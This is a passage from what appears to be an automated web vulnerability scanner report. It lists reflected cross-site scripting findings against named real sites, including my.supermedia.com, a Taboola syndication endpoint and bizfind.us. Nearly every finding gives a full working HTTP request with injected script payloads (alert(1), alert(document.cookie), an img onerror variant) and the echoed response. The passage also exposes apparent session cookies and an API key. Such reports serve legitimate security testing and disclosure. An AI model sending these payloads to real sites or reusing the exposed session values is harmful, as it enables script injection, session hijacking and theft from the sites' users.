User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:37 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 13526
Connection: close
Content-Type: text/html


<head>
   <base href="http://managedq.com/">    
<script src="http://www.google.com/jsapi?key=ABQIAAAAfY9R5yZEX7c7fNMc_53H-RSS93VGBhy0VH-F4ConCm_atGP3gxQMWmXfPasKYusJ-dKLng0cAOqm0g" type="text/javascri
...[SNIP]...
stimatedResultCount)
//        searcher.cursor.estimatedResultCount
       }

   searchControl.setSearchCompleteCallback(this, OnSearchComplete);
// Execute an inital search
searchControl.execute("obamabe8e1";alert(1)//d33907aeb4e");

   //search.gotoPage(3)
//    searchControl.execute("managedq");
}
google.setOnLoadCallback(OnLoad);

//setTimeout("alert(string)",4000)

//]]>
...[SNIP]...

3.68. http://my.supermedia.com/customersupport/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.supermedia.com
Path:   /customersupport/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33517"><script>alert(1)</script>270ee3472e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /customersupport/index.jsp?33517"><script>alert(1)</script>270ee3472e7=1 HTTP/1.1
Host: my.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=NLFJq9n0bBhhzyJhvk4QvL8pkD21vl5vWhQzpt89hzzNngVTZQ1j!-550558129!-1173275059; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:48:30 GMT
Content-Length: 19431
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Server: Unspecified
Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:56:06 GMT;path=/;httponly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- tiles layout page => standard_page.jsp -->
<!-- <html head
...[SNIP]...
<a class="RightNavLink" href="http://my.supermedia.com:80/customersupport/index.jsp?33517"><script>alert(1)</script>270ee3472e7=1&print=ed">
...[SNIP]...

3.69. http://my.supermedia.com/directoryoptout [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.supermedia.com
Path:   /directoryoptout

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37fe3"><script>alert(1)</script>84741f5cfde was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /directoryoptout?37fe3"><script>alert(1)</script>84741f5cfde=1 HTTP/1.1
Host: my.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:36:26 GMT
Pragma: no-cache
Content-Length: 24725
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=NLD6RFdXPRTw2vwG1LgBrG7JnC27kyJ154JBgp4LL03M7ljcGhrz!-1173275059!-550558129; path=/
Cache-Control: no-store
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Server: Unspecified
Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:44:01 GMT;path=/;httponly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- tiles layout page => standard_page.jsp -->
<!-- <html head
...[SNIP]...
<a class="RightNavLink" href="http://my.supermedia.com:80/directoryoptout/index.jsp?37fe3"><script>alert(1)</script>84741f5cfde=1&print=ed">
...[SNIP]...

3.70. http://my.supermedia.com/directoryoptout/ [37fe3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E84741f5cfde parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.supermedia.com
Path:   /directoryoptout/

Issue detail

The value of the 37fe3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E84741f5cfde request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e8cf"><script>alert(1)</script>b83041eb0df was submitted in the 37fe3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E84741f5cfde parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /directoryoptout/?37fe3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E84741f5cfde=11e8cf"><script>alert(1)</script>b83041eb0df HTTP/1.1
Host: my.supermedia.com
Proxy-Connection: keep-alive
Referer: http://burp/show/1
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; JSESSIONID=NLD6ljxjQJDXGQgrK61P3yT1JkXkjgDLb1jBKjgFT6wzymnbnMhk!-550558129!-1173275059; mbox=session#1296759528614-838261#1296763713|check#true#1296761913; s_cc=true; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:46:25 GMT
Pragma: no-cache
ntCoent-Length: 24682
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store
Content-Type: text/html; charset=ISO-8859-1
Server: Unspecified
Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:54:01 GMT;path=/;httponly
Content-Length: 24682


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- tiles layout page => standard_page.jsp -->
<!-- <html head
...[SNIP]...
<a class="RightNavLink" href="http://my.supermedia.com:80/directoryoptout/index.jsp?37fe3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E84741f5cfde=11e8cf"><script>alert(1)</script>b83041eb0df&print=ed">
...[SNIP]...

3.71. http://my.supermedia.com/directoryoptout/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.supermedia.com
Path:   /directoryoptout/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a87e3"><script>alert(1)</script>55222cbb99d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /directoryoptout/?37fe3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E84741f5cfde=1&a87e3"><script>alert(1)</script>55222cbb99d=1 HTTP/1.1
Host: my.supermedia.com
Proxy-Connection: keep-alive
Referer: http://burp/show/1
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; JSESSIONID=NLD6ljxjQJDXGQgrK61P3yT1JkXkjgDLb1jBKjgFT6wzymnbnMhk!-550558129!-1173275059; mbox=session#1296759528614-838261#1296763713|check#true#1296761913; s_cc=true; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:48:03 GMT
Pragma: no-cache
ntCoent-Length: 24688
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store
Content-Type: text/html; charset=ISO-8859-1
Server: Unspecified
Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:55:39 GMT;path=/;httponly
Content-Length: 24688


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- tiles layout page => standard_page.jsp -->
<!-- <html head
...[SNIP]...
<a class="RightNavLink" href="http://my.supermedia.com:80/directoryoptout/index.jsp?37fe3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E84741f5cfde=1&a87e3"><script>alert(1)</script>55222cbb99d=1&print=ed">
...[SNIP]...

3.72. http://my.supermedia.com/directoryoptout/confirm.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.supermedia.com
Path:   /directoryoptout/confirm.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 319e1"><script>alert(1)</script>a37efd293c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /directoryoptout/confirm.do?319e1"><script>alert(1)</script>a37efd293c2=1 HTTP/1.1
Host: my.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=NLFJq9n0bBhhzyJhvk4QvL8pkD21vl5vWhQzpt89hzzNngVTZQ1j!-550558129!-1173275059; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:48:32 GMT
Pragma: no-cache
Content-Length: 25076
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Server: Unspecified
Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:56:08 GMT;path=/;httponly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- tiles layout page => standard_page.jsp -->
<!-- <html head
...[SNIP]...
<a class="RightNavLink" href="http://my.supermedia.com:80/directoryoptout/index.jsp?319e1"><script>alert(1)</script>a37efd293c2=1&print=ed">
...[SNIP]...

3.73. http://my.supermedia.com/directoryoptout/index.jsp [37fe3%22%3E%3Cscript%3Ealert(document.cookie parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.supermedia.com
Path:   /directoryoptout/index.jsp

Issue detail

The value of the 37fe3%22%3E%3Cscript%3Ealert(document.cookie request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1233c"><script>alert(1)</script>6337a742d73 was submitted in the 37fe3%22%3E%3Cscript%3Ealert(document.cookie parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /directoryoptout/index.jsp?37fe3%22%3E%3Cscript%3Ealert(document.cookie1233c"><script>alert(1)</script>6337a742d73 HTTP/1.1
Host: my.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=NLFJq9n0bBhhzyJhvk4QvL8pkD21vl5vWhQzpt89hzzNngVTZQ1j!-550558129!-1173275059; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:48:24 GMT
Pragma: no-cache
Content-Length: 24636
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Server: Unspecified
Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:55:59 GMT;path=/;httponly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- tiles layout page => standard_page.jsp -->
<!-- <html head
...[SNIP]...
<a class="RightNavLink" href="http://my.supermedia.com:80/directoryoptout/index.jsp?37fe3%22%3E%3Cscript%3Ealert(document.cookie1233c"><script>alert(1)</script>6337a742d73&print=ed">
...[SNIP]...

3.74. http://my.supermedia.com/directoryoptout/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.supermedia.com
Path:   /directoryoptout/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7cb13"><script>alert(1)</script>0d37311fbea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /directoryoptout/index.jsp?7cb13"><script>alert(1)</script>0d37311fbea=1 HTTP/1.1
Host: my.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=NLFJq9n0bBhhzyJhvk4QvL8pkD21vl5vWhQzpt89hzzNngVTZQ1j!-550558129!-1173275059; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763713|check#true#1296761913;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:48:31 GMT
Pragma: no-cache
Content-Length: 24551
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Server: Unspecified
Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:56:06 GMT;path=/;httponly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!-- tiles layout page => standard_page.jsp -->
<!-- <html head
...[SNIP]...
<a class="RightNavLink" href="http://my.supermedia.com:80/directoryoptout/index.jsp?7cb13"><script>alert(1)</script>0d37311fbea=1&print=ed">
...[SNIP]...

3.75. http://trc.taboolasyndication.com/dispatch/ [format parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /dispatch/

Issue detail

The value of the format request parameter is copied into the HTML document as plain text between tags. The payload c34fc<script>alert(1)</script>1395c3bee03 was submitted in the format parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dispatch/?publisher=veoh&list-id=rbox-blended&format=jsonc34fc<script>alert(1)</script>1395c3bee03&id=366&list-size=12&uim=rbox-blended&intent=s&item-id=v18978294NGnK88j8&item-type=video&item-url=http%3A//www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8&page-id=252bf48a1c3557304769eba4cb04a734b0b966bf&pv=2&cv=4-6-1-43135-1081071&uiv=default&uploader=bunny12344&v=35284&content-rating=0&external=http%3A//burp/show/11 HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 serializer id "jsonc34fc<script>alert(1)</script>1395c3bee03" is not configured. selectionMethod=request-parameter, selectionParam=format, defaultSerializer=xml
Date: Thu, 03 Feb 2011 21:44:41 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: taboola_user_id=a72418f5-7573-4033-a20c-768665ba4c71;Path=/;Expires=Fri, 03-Feb-12 21:44:41 GMT
Set-Cookie: taboola_session_id_veoh=v1_7d4cc60fd932dcc7937c149c3cdf9f52_a72418f5-7573-4033-a20c-768665ba4c71_1296769481_1296769481;Path=/
Set-Cookie: JSESSIONID=.prod2-f3;Path=/
Set-Cookie: taboola_wv_veoh=4501877959146416130;Path=/;Expires=Fri, 03-Feb-12 21:44:41 GMT
Set-Cookie: taboola_rii_veoh=1039225080754099931_5874168958137325309;Path=/;Expires=Fri, 03-Feb-12 21:44:42 GMT
Vary: Accept-Encoding
Connection: close
Content-Length: 4107

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 500 serializer id "jsonc34fc&lt;script&gt;alert(1)&lt;/script&gt;1395c3bee03" is not configured. se
...[SNIP]...
<pre>com.taboola.trc.vhf.exceptions.VHFRequestException: serializer id "jsonc34fc<script>alert(1)</script>1395c3bee03" is not configured. selectionMethod=request-parameter, selectionParam=format, defaultSerializer=xml
   at com.taboola.trc.vhf.adaptor.RecommendationClientAdaptor.selectSerializer(RecommendationClientAda
...[SNIP]...

3.76. http://trc.taboolasyndication.com/dispatch/ [item-type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /dispatch/

Issue detail

The value of the item-type request parameter is copied into the HTML document as plain text between tags. The payload 93a54<script>alert(1)</script>e2384cd3dfb was submitted in the item-type parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dispatch/?publisher=veoh&list-id=rbox-blended&format=json&id=366&list-size=12&uim=rbox-blended&intent=s&item-id=v18978294NGnK88j8&item-type=video93a54<script>alert(1)</script>e2384cd3dfb&item-url=http%3A//www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8&page-id=252bf48a1c3557304769eba4cb04a734b0b966bf&pv=2&cv=4-6-1-43135-1081071&uiv=default&uploader=bunny12344&v=35284&content-rating=0&external=http%3A//burp/show/11 HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 No enum const class com.taboola.model.general.RecommendableItem$ItemType.video93a54<script>alert(1)</script>e2384cd3dfb
Date: Thu, 03 Feb 2011 21:45:01 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: taboola_user_id=b3bd9e1a-f928-4358-bae5-e232f65ed404;Path=/;Expires=Fri, 03-Feb-12 21:45:01 GMT
Set-Cookie: taboola_session_id_veoh=v1_ffd326beb15e99ba266c923fcd06736e_b3bd9e1a-f928-4358-bae5-e232f65ed404_1296769501_1296769501;Path=/
Set-Cookie: JSESSIONID=.prod2-f1;Path=/
Vary: Accept-Encoding
Connection: close
Content-Length: 4183

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 500 No enum const class com.taboola.model.general.RecommendableItem$ItemType.video93a54&lt;script&g
...[SNIP]...
<pre>java.lang.IllegalArgumentException: No enum const class com.taboola.model.general.RecommendableItem$ItemType.video93a54<script>alert(1)</script>e2384cd3dfb
   at java.lang.Enum.valueOf(Enum.java:196)
   at com.taboola.model.general.RecommendableItem$ItemType.valueOf(RecommendableItem.java:69)
   at com.taboola.trc.data.TextRelatedContentDataSource.getItemType(
...[SNIP]...

3.77. http://trc.taboolasyndication.com/dispatch/ [list-id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /dispatch/

Issue detail

The value of the list-id request parameter is copied into the HTML document as plain text between tags. The payload 5b0f1<script>alert(1)</script>7876a2b5e3a was submitted in the list-id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dispatch/?publisher=veoh&list-id=rbox-blended5b0f1<script>alert(1)</script>7876a2b5e3a&format=json&id=366&list-size=12&uim=rbox-blended&intent=s&item-id=v18978294NGnK88j8&item-type=video&item-url=http%3A//www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8&page-id=252bf48a1c3557304769eba4cb04a734b0b966bf&pv=2&cv=4-6-1-43135-1081071&uiv=default&uploader=bunny12344&v=35284&content-rating=0&external=http%3A//burp/show/11 HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 unsupported request id: rbox-blended5b0f1<script>alert(1)</script>7876a2b5e3a, for publisher: PublisherVariant:veoh(default_with_ads)
Date: Thu, 03 Feb 2011 21:44:34 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: taboola_user_id=6b3a89d9-b958-41dd-9e3d-cae259e7686f;Path=/;Expires=Fri, 03-Feb-12 21:44:34 GMT
Set-Cookie: taboola_session_id_veoh=v1_ef0ffcfd24d42f1d8f2b50542c8bf625_6b3a89d9-b958-41dd-9e3d-cae259e7686f_1296769474_1296769474;Path=/
Set-Cookie: JSESSIONID=.prod2-f3;Path=/
Set-Cookie: taboola_wv_veoh=4501877959146416130;Path=/;Expires=Fri, 03-Feb-12 21:44:34 GMT
Vary: Accept-Encoding
Connection: close
Content-Length: 4111

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 500 unsupported request id: rbox-blended5b0f1&lt;script&gt;alert(1)&lt;/script&gt;7876a2b5e3a, for
...[SNIP]...
<pre>com.taboola.trc.vhf.exceptions.VHFConfigurationException: unsupported request id: rbox-blended5b0f1<script>alert(1)</script>7876a2b5e3a, for publisher: PublisherVariant:veoh(default_with_ads)
   at com.taboola.trc.vhf.viewsHandler.GeneralViewsProducer.handleViewRequest(GeneralViewsProducer.java:336)
   at com.taboola.trc.vhf.viewsHandler.
...[SNIP]...

3.78. http://trc.taboolasyndication.com/dispatch/ [publisher parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /dispatch/

Issue detail

The value of the publisher request parameter is copied into the HTML document as plain text between tags. The payload 3cb6d<script>alert(1)</script>b0331f67d92 was submitted in the publisher parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dispatch/?publisher=veoh3cb6d<script>alert(1)</script>b0331f67d92&list-id=rbox-blended&format=json&id=366&list-size=12&uim=rbox-blended&intent=s&item-id=v18978294NGnK88j8&item-type=video&item-url=http%3A//www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8&page-id=252bf48a1c3557304769eba4cb04a734b0b966bf&pv=2&cv=4-6-1-43135-1081071&uiv=default&uploader=bunny12344&v=35284&content-rating=0&external=http%3A//burp/show/11 HTTP/1.1
Host: trc.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Invalid publisher name in recommendation request: veoh3cb6d<script>alert(1)</script>b0331f67d92
Date: Thu, 03 Feb 2011 21:44:27 GMT
Server: Jetty(6.1.7)
P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Connection: close
Content-Length: 3330

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 500 Invalid publisher name in recommendation request: veoh3cb6d&lt;script&gt;alert(1)&lt;/script&gt
...[SNIP]...
<pre>com.taboola.trc.vhf.exceptions.VHFConfigurationException: Invalid publisher name in recommendation request: veoh3cb6d<script>alert(1)</script>b0331f67d92
   at com.taboola.trc.vhf.adaptor.RecommendationClientAdaptor.dispatchPrehandling(RecommendationClientAdaptor.java:746)
   at com.taboola.trc.vhf.adaptor.RecommendationClientAdaptor.httpClientRequest(Reco
...[SNIP]...

3.79. http://www.bizfind.us/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bizfind.us
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97bfe"><script>alert(1)</script>18ca5e0718d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?97bfe"><script>alert(1)</script>18ca5e0718d=1 HTTP/1.1
Host: www.bizfind.us
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
